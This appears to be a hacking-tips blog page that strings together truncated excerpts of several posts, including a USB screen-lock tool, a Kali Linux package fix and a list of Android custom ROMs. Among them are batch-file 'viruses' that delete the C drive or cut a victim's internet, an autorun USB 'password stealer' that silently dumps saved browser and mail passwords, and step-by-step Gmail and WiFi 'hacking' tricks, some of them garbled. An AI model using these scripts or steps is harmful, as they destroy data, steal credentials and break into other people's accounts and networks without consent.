
How to Lock and Unlock a Computer with USB PenDrive !

It is a very simple process. I’ll guide step by step but make sure a working USB Pendrive without any virus or malware. It’s okay if you already have some important files on your Pendrive, this software does not require empty Pendrives. Step 1:  Download and install a software:   Predator .       This software locks your PC when you are away, even if your Windows session is still active. It uses a regular USB flash drive as an access control device. Step 2:  Once Predator launches plug in the Pendrive. When you’re away from your PC, you simply remove the USB drive: – once it is removed, the keyboard and mouse are disabled and the screen darkens when you return back to your PC, you put the USB flash drive in place: – keyboard and mouse are immediately released, and the display is restored. Step 3 :   When you insert the USB Pendrive, Predator will ask you whether you want to create a password. Click OK to continue. Ste...

Kali Linux Repository Issue "E: Unable To Locate Package ERROR"

Kali Linux is based on Debian Testing. Most packages Kali uses are imported from the Debian  repositories . Kali Linux is developed using a secure environment with only a small number of trusted people that are allowed to commit packages, with each package being digitally signed by the developer. Kali also has a custom-built kernel that is patched for 802.11 wireless injection. This was primarily added because the development team found they needed to do a lot of wireless assessments. Do you ever experience something like this you are about to install something?                  "E: Unable to locate package..." .... now don't worry about this we are going to fix this problem!!!!!!!!!!!!  Here is the solution, replace the source.list code below and place it in the /etc/apt/   HERE FIND SOURCE LIST ND REPLACE WITH .  >>> $ sudo nano source.list Now paste the following code at the last line of ...

Steps To Create Dangerous Computer/ PC virus In 2 min

#1. Create A Most Dangerous Notepad Virus First open your notepad in your window OS. Then copy and paste the code lying below in your notepad application @Echo off Del C: *.* |y Then save this data as file name Way2Us.bat Now running this file in victim computer will clear all the data of C drive completely, and the Os will get corrupted. #2. Virus to stop victim access to internet This you can use to stop someone's access to internet. Open notepad and copy this below code to notepad. @Echo off Ipconfig /release Now save it as in a .bat format. Name it as Way2us.bat then send it to victim. And if he click that file his ip address will be deleted. Hence he wont be able to connect to internet. And for fixing it just type IPconfig/renew. #3: Crash victims for ever This is also in the list of most dangerous virus according to me as it can crash your Pc forever. Open notepad and copy the code below and paste it in that. @ echo off at...

Top 10 Most Powerful Custom ROMs For Android Device

Top 10 Most Powerful Custom Roms For Android Device, almost Every Android Smartphones comes with a Stock Rom , We easily get bored by the stock ROM interface provided by the manufacturer and not only bored, it lags too much, low potential, Lots of bloatware etc. So if you are one those who is facing the same problem then you are absolutely reading the right Article. This Article is a comprehensive list of Top Ten Most Powerful Custom Rom for Android. Now you must be thinking that What is a Custom Rom? A custom ROM is a fully standalone version of the OS, including the kernel (which makes everything run), apps, services, with lots of customization, tweaks and lots more. Advantages Of A Custom ROM:- 1. Better Performance And Efficiency 2. Can upgrade to Latest Version of Android 3. Theme Engines 4. Removal of Bloatware 5. Battery Life Enhancement and Lots More 1. CyanogenMod CyanogenMod is one of the most famous as well as powerful custom ROM. CyanogenMod ha...

USB password stealer

This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive- SDCZ33-064G-B35 open notepad/wordpad  type:     [autorun]     open=launch.bat     ACTION= Perform a Virus Scan save this as AUTORUN.inf open a new notepad/wordpad document type:     start mspass.exe /stext mspass.txt     start mailpv.exe /stext mailpv.txt     start iepv.exe /stext iepv.txt     start pspv.exe /stext pspv.txt     start PasswordFox.exe /stext passwordfox.txt     start OperaPassView.exe /stext OperaPassView.txt     start ChromePass.exe /stext ChromePass.txt     start Dialup...

How To Hack An Gmail Account 2017

Hello Guys Today I Found A New Trick On Internet, This Is About Gmail Hacking.. Follow These Simple Steps - 1- first sign out of your gmail account . 2- go to "I Cannot Access My Account " tab which is below the password field 3- go to and enter any random name eg:ron and then click check inbox and leave it open. 4- On "I Cannot Access My Account " page in Gmail just click forgot my username and go to username recovery page. 5- Enter The Yopmail email you just opened eg : 6- now click check for new emails tab in yopmail you will get all the gmail id's associated with it eg you'll get some gmail id's like copy that id 7- just go again to the "I Cannot Access My Account " in gmail and this time choose forgot my password and go to password recovery page 8- Now Enter The Gmail Id You Copied in username fill the captcha and everything 9- If The Gmail Password recovery e...

How To Hack Wifi Password With Android !

Hello Guys , I Search Allover Wi-fi Hacking Tool, Now I Find A Wifi Hacking Trick For Android Users. You Can Hack Wpa Wps Wifi Network With This Trick, Don' t Use This Trick On Other Networks, Otherwise You Will Lost Your Hope.. Follow These Simple Steps - 1- First Of All You Need To Download Wifi Wpa Wps Tester On Your Android Device.. 2- Then Switch On Your Wifi Network And Scan For Available Wpa/Wps Wifi Network. 3- As Soon As You Notice Available Wifi Network Then Open “Wifi Wpa Wps Tester” App. 4- Now You Need To Click On Green Colour Refresh Button And It Will Show You All Available Networks There. 5- Now Just Click On [Green Colour Locked Key Locker] Symbol And Click On Try To Connect Network Option. 6- Now It Will Show You Some Thing Like This: Ssid=”D-Link” Psk=”password” Key_mgmt=WPA-PSK Priority=1 } - ssid=”D-Link” key_mgmt=NONE priority=6 }   7- Now You Can See Password Of That Wifi In The Above Given Code, Which Is Coated Just Infront O...